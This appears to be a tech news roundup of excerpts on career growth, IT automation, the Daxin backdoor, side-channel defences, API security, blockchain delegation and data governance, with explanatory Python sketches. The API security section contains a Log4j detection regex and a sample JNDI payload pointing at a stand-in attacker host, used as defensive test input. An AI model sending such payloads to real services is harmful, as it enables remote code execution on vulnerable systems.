Follow your S curve

By the time Rogers’s seminal Diffusion of Innovations was published in 1962, the rural sociologist was convinced that the S curve of innovation diffusion depicted “a kind of universal process of social change.” Indeed, S curves have been used in many arenas since then, and Rogers’s book is among the most cited in the social sciences, according to Google Scholar. Johnson’s S Curve of Learning follows this well-established path. There’s the slow advancement toward a “launch point,” during which you canvass the (hopefully) myriad opportunities for career growth available to you and pick a promising one. Then there’s the fast growth once you hit the “sweet spot,” as you build momentum, forging and inhabiting the new you. And, finally, there is “mastery,” the stage in which you might cruise for a while, reaping the rewards of your efforts, before you start looking for something new and begin the cycle all over again. Johnson lays out six different roles that you must play as you travel along her learning curve. In the launch phase, where I spent what felt like an eternity, you first act as an Explorer, who searches for and picks a destination.

Automation: 5 issues for IT teams to watch in 2022



IT automation rarely involves IT alone. Virtually any initiative beyond the experimentation or proof-of-concept phase will involve at least two – and likely several – areas of the business. The more ambitious the goals, the truer this becomes. Good luck to the IT leaders who tackle, for example, “improve customer satisfaction ratings by X” or “reduce call wait times by Y” without involving marketing, customer service/customer experience, and other teams. In fact, automation initiatives are best served by aligning various stakeholders from the very start – before specific goals (and metrics for evaluating progress toward those goals) are set. “It’s really important to identify the key benefits you wish to achieve and get all stakeholders on the same page,” says Mike Mason, global head of technology at Thoughtworks. This entails more than just rubber-stamping your way to a consensus that automation will be beneficial to the business. Stakeholders need to align on why they want to automate certain processes or workflows, what the impacts (including potential downsides) will be, and what success actually looks like. Presuming alignment on any of these issues can put the whole project at risk.

Daxin: Stealthy Backdoor Designed for Attacks Against Hardened Networks

Daxin is a backdoor that allows the attacker to perform various operations on the infected computer, such as reading and writing arbitrary files. The attacker can also start arbitrary processes and interact with them. While the set of operations recognized by Daxin is quite narrow, its real value to attackers lies in its stealth and communications capabilities. Daxin is capable of communicating by hijacking legitimate TCP/IP connections. To do so, it monitors all incoming TCP traffic for certain patterns. Whenever any of these patterns is detected, Daxin disconnects the legitimate recipient and takes over the connection. It then performs a custom key exchange with the remote peer, in which the two sides follow complementary steps. The malware can act as both the initiator and the target of a key exchange. A successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin’s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules.
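The excerpt does not describe Daxin's custom key exchange. The sketch below illustrates the general idea of a key exchange in which "two sides follow complementary steps" and either side can be the initiator or the target. It substitutes a textbook Diffie-Hellman exchange and is not Daxin's protocol. The helper names (`initiate`, `respond`, `derive_key`) and the toy parameters are assumptions. The 127-bit prime is far too small for real-world security.

```python
import hashlib
import secrets

# Toy public parameters (assumption): the Mersenne prime 2**127 - 1 and base 3.
# Real deployments use much larger, standardized groups.
P = 2**127 - 1
G = 3


def make_keypair() -> tuple[int, int]:
    """Pick a random private exponent in [1, P-2] and derive its public value."""
    private = secrets.randbelow(P - 2) + 1
    return private, pow(G, private, P)


def derive_key(my_private: int, peer_public: int) -> bytes:
    """Combine our private exponent with the peer's public value into a 32-byte key."""
    shared = pow(peer_public, my_private, P)
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()


def initiate() -> tuple[int, int]:
    """Initiator step: generate a key pair and send only the public half."""
    return make_keypair()


def respond(initiator_public: int) -> tuple[int, bytes]:
    """Target step: reply with our own public value and derive the key locally."""
    private, public = make_keypair()
    return public, derive_key(private, initiator_public)


# Example: both sides end up with the same key without ever transmitting it.
init_private, init_public = initiate()
target_public, target_key = respond(init_public)
init_key = derive_key(init_private, target_public)
print(init_key == target_key)  # True
```

The steps are complementary because each side raises the other's public value to its own private exponent, so both arrive at G^(ab) mod P.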

Leveraging mobile networks to threaten national security

Once threat actors have access to mobile telecoms environments, the threat landscape is such that several orders of magnitude of leverage are possible in the execution of cyberattacks. The ability to infiltrate, manipulate and emulate the operations of communications service providers and trusted brands, abusing the trust of the countless people who use their services every day, derives from threat actors’ capability to weaponize the ‘trust’ built into the very design of the protocols, systems, and processes that exchange traffic between service providers globally. The primary point of leverage derives from threat actors’ sustained capacity, over time, to acquire data of targeting value, including personally identifiable information on public and private citizens alike. Such information can be gained through cyberattacks aimed specifically at the data-rich network environments of mobile operators themselves. However, data breaches at major data holders across industries are now so frequent that it is increasingly possible to simply purchase massive amounts of such data from other threat actors.

A Security Technique To Fool Would-Be Cyber Attackers

Researchers demonstrate a method that safeguards a computer program’s secret information while enabling faster computation. Multiple programs running on the same computer may not be able to directly access each other’s hidden information, but because they share the same memory hardware, their secrets could be stolen by a malicious program through a “memory timing side-channel attack.” This malicious program notices delays when it tries to access a computer’s memory, because the hardware is shared among all programs using the machine. It can then interpret those delays to obtain another program’s secrets, like a password or cryptographic key. One way to prevent these types of attacks is to allow only one program to use the memory controller at a time, but this dramatically slows down computation. Instead, a team of MIT researchers has devised a new approach that allows memory sharing to continue while providing strong security against this type of side-channel attack. Their method is able to speed up programs by 12 percent when compared to state-of-the-art security schemes.
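A deliberately simplified model shows the leak and why the one-program-at-a-time defense closes it. This sketch is not the MIT team's method. It assumes a hypothetical memory controller that serves one request per cycle. It compares a shared policy, where the victim's request is served first on a collision, with a fixed time-slot policy, where each program may use the controller only in its own slot. The function names and slot parameters are illustrative assumptions.

```python
from typing import List


def shared_fifo_latency(victim_active: List[bool]) -> List[int]:
    """Toy shared controller: when the victim also issues a request in a cycle,
    its request goes first, so the attacker waits one extra cycle."""
    return [2 if active else 1 for active in victim_active]


def time_division_latency(victim_active: List[bool], slots: int = 2, my_slot: int = 0) -> List[int]:
    """Toy isolated controller: the attacker is served only in its own slot.
    victim_active is used only for its length; the victim's activity has no effect."""
    latencies = []
    for cycle in range(len(victim_active)):
        wait = (my_slot - cycle) % slots  # cycles until the attacker's next slot
        latencies.append(wait + 1)
    return latencies


busy = [True, False, True, True]
idle = [False, False, False, False]
print(shared_fifo_latency(busy), shared_fifo_latency(idle))      # [2, 1, 2, 2] [1, 1, 1, 1]
print(time_division_latency(busy), time_division_latency(idle))  # [1, 2, 1, 2] [1, 2, 1, 2]
```

Under the shared policy, the attacker's timings reveal exactly when the victim touched memory. Under fixed slots, the timings are identical whatever the victim does. The price is that slots go unused whenever the other program is idle, which is the slowdown the excerpt describes.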

Is API Security the New Cloud Security?

While organizations previously used APIs more sparingly, predominantly for mobile apps or some B2B traffic, “now pretty much everything is powered by an API,” Klimek said. “So of course, all of these new APIs introduce a lot of security risks, and that’s why a lot of CISOs are now paying attention.” Imperva, which Gartner named a “leader” in its web application and API protection (WAAP) Magic Quadrant, lumps API security risks into two categories, according to Klimek. The first one, technical vulnerabilities, includes a bunch of risks that can also exist in standard web applications, such as the OWASP Top 10 application security risks and CVE vulnerabilities. The recent Log4j vulnerability falls into this bucket, and it demonstrates how far-reaching these types of security flaws can be. Most Imperva customers tackle these API threats first, “because they tend to be some of the most acute and they require just adopting their existing application security strategies,” such as code scanning during the development process and deploying web application firewalls or runtime application self-protection technology, Klimek explained.
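As a concrete case of the Log4j example, the vulnerability (CVE-2021-44228, "Log4Shell") is triggered when attacker-controlled text containing a JNDI lookup such as `${jndi:ldap://...}` gets logged. The sketch below shows the kind of signature check a web application firewall might apply to incoming API requests. The `flag_request` helper and its pattern are hypothetical simplifications, not Imperva's product logic. Attackers routinely obfuscate such strings to slip past simple matches like this one.

```python
import re
from typing import Mapping

# Hypothetical rule: match the start of a JNDI lookup, case-insensitively.
# Obfuscated variants (e.g. nested lookups) are NOT caught by this pattern.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def flag_request(headers: Mapping[str, str], body: str = "") -> list[str]:
    """Return the names of request fields whose values contain a JNDI lookup."""
    hits = [name for name, value in headers.items() if JNDI_PATTERN.search(value)]
    if JNDI_PATTERN.search(body):
        hits.append("<body>")
    return hits


suspicious = {"User-Agent": "${jndi:ldap://attacker.example/a}", "Accept": "*/*"}
print(flag_request(suspicious))  # ['User-Agent']
```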

Inside the blockchain developers’ mind: Building a free-to-use social DApp

While we still have a pretty good user experience, telling people they have to spend money before they can use an app is a barrier to entry and winds up feeling a whole lot like a fee. I would know: this is exactly what happened on our previous blockchain, Steem. To solve that problem, we added a feature called “delegation,” which allowed people with tokens (e.g. developers) to delegate their mana (called Steem Power) to their users. This way, end users could use Steem-based applications even if they didn’t have any of the native token, STEEM. But that design was very tailored to Steem, which did not have smart contracts and required users to first buy accounts. The biggest problem with delegation was that there was no way to control what a user did with it. Developers want people to be able to use their DApps for free so that they can maximize growth and generate revenue in some other way, like a subscription or in-game item sales. They don’t want people taking their delegation to trade in decentralized finance (DeFi) or using it to play some other developer’s great game like Splinterlands.
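The problem described above is that a plain delegation cannot restrict what the user does with it. One way to address this is to attach a scope to the delegation. The sketch below is a hypothetical illustration of that idea, not Steem's delegation mechanism or the author's eventual design. The `ScopedDelegation` class, its fields and the contract names are all assumptions.

```python
from dataclasses import dataclass


@dataclass
class ScopedDelegation:
    """Hypothetical record: resources a developer lends to a user, spendable
    only on contracts the developer has whitelisted."""
    delegator: str
    delegatee: str
    allowed_contracts: frozenset[str]
    remaining: int

    def spend(self, contract: str, cost: int) -> bool:
        """Charge `cost` if the call targets an allowed contract and enough
        delegated resource remains; otherwise refuse and charge nothing."""
        if contract not in self.allowed_contracts or cost > self.remaining:
            return False
        self.remaining -= cost
        return True


grant = ScopedDelegation("game_dev", "alice", frozenset({"my_game"}), remaining=100)
print(grant.spend("my_game", 30))    # True
print(grant.spend("defi_swap", 10))  # False: not a whitelisted contract
print(grant.remaining)               # 70
```

Checking the target contract at spend time lets the developer subsidize usage of their own DApp while refusing transfers into unrelated applications.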



Data governance at the speed of business

Once the data governance organization has been built and its initial policies defined, you can begin to build the muscles that will make data governance a source of nimbleness that will help you anticipate issues, seize opportunities, and pivot quickly as the business environment changes and new sources of data become available. Your data governance capability is responsible for identifying, classifying, and integrating these new and changing data sources, which may come in through milestone events such as mergers or via the deployment of new technologies within your organization. It does so by defining and applying a repeatable set of policies, processes, and supporting tools, the application of which you can think of as a gated process: a sequence of checkpoints new data must pass through to ensure its quality. The first step of the process is to determine what needs to be done to introduce the new data harmoniously. Take, for example, one of our B2B software clients that acquired a complementary company and sought to consolidate the firm’s customer data.
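The "gated process" can be pictured as an ordered list of checks that each incoming record must clear before it is admitted. The sketch below assumes hypothetical record fields and gate rules for a customer-data consolidation like the one in the example. It is not the authors' actual process. A record that fails any gate is quarantined along with the name of the first gate it failed.

```python
from typing import Callable, Iterable

Record = dict
Check = Callable[[Record], bool]


def run_gates(records: Iterable[Record], gates: list[tuple[str, Check]]) -> tuple[list[Record], list[tuple[Record, str]]]:
    """Pass each record through the gates in order; admit it only if it clears
    every gate, otherwise quarantine it with the first failing gate's name."""
    admitted, quarantined = [], []
    for record in records:
        failed = next((name for name, check in gates if not check(record)), None)
        if failed is None:
            admitted.append(record)
        else:
            quarantined.append((record, failed))
    return admitted, quarantined


# Hypothetical gates for merging an acquired company's customer records.
GATES = [
    ("has_customer_id", lambda r: bool(r.get("customer_id"))),
    ("valid_email", lambda r: "@" in r.get("email", "")),
    ("known_region", lambda r: r.get("region") in {"EMEA", "AMER", "APAC"}),
]

incoming = [
    {"customer_id": "C-001", "email": "ana@example.com", "region": "EMEA"},
    {"customer_id": "", "email": "bo@example.com", "region": "AMER"},
    {"customer_id": "C-003", "email": "no-at-sign", "region": "APAC"},
]
ok, held = run_gates(incoming, GATES)
print(len(ok), [gate for _, gate in held])  # 1 ['has_customer_id', 'valid_email']
```

Keeping the gates as data rather than hard-coded logic makes the policy repeatable: a later merger can reuse the same runner with a different gate list.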

Irish data watchdog calls for ‘objective metrics’ for big tech regulation

Dixon said that “in some respects at least”, the DPC needs to do better and that it would be beneficial for regulators to have a “shared understanding” of what measures they are tracking. “In the absence of an agreed set of measures to determine achievements or deficiencies, the standing of the GDPR’s enforcement regime in overall terms is at risk of damage,” she said. Dixon said that this was particularly the case “when certain types of allegations” levelled against the Irish DPC “serve only to obscure the true nature and extent of the challenges” presented by the EU regulatory framework – which requires member states to legislate for the enforcement of data protection across the EU. ... That has created a vacuum and “a narrative has emerged in which the number of cases, the quantity and size of the administrative fines levied, are treated as the sole measure of success, informed by the effectiveness of financial penalties” at driving changes in behaviour.

Digital transformation: 3 roadblocks and how to overcome them

Many sectors, such as healthcare and financial services, operate within a complex web of constantly changing regulations that can be difficult to navigate. These regulations, while stringent, are critical for protecting sensitive data such as patient information in healthcare, for ensuring the proper execution of protocol in law enforcement, and for governing other essential data that must be managed and used responsibly. How customer and internal data is collected, stored, managed, and used must be prioritized, especially when an enterprise transitions from legacy systems. Establishing a digital system that supports regulatory compliance is a challenge, but once the system is established, every interaction within the organization becomes data that can be monitored, provided you have the tools to interpret it. Knowing what is going on in every corner of an organization is central to remaining compliant, and setting up intelligent tools that can detect risk across the enterprise will help ensure that your organization’s digital transformation is rooted in compliance-first strategies.

Quote for the day:

"Great Groups need to know that the person at the top will fight like a tiger for them." -- Warren G. Bennis
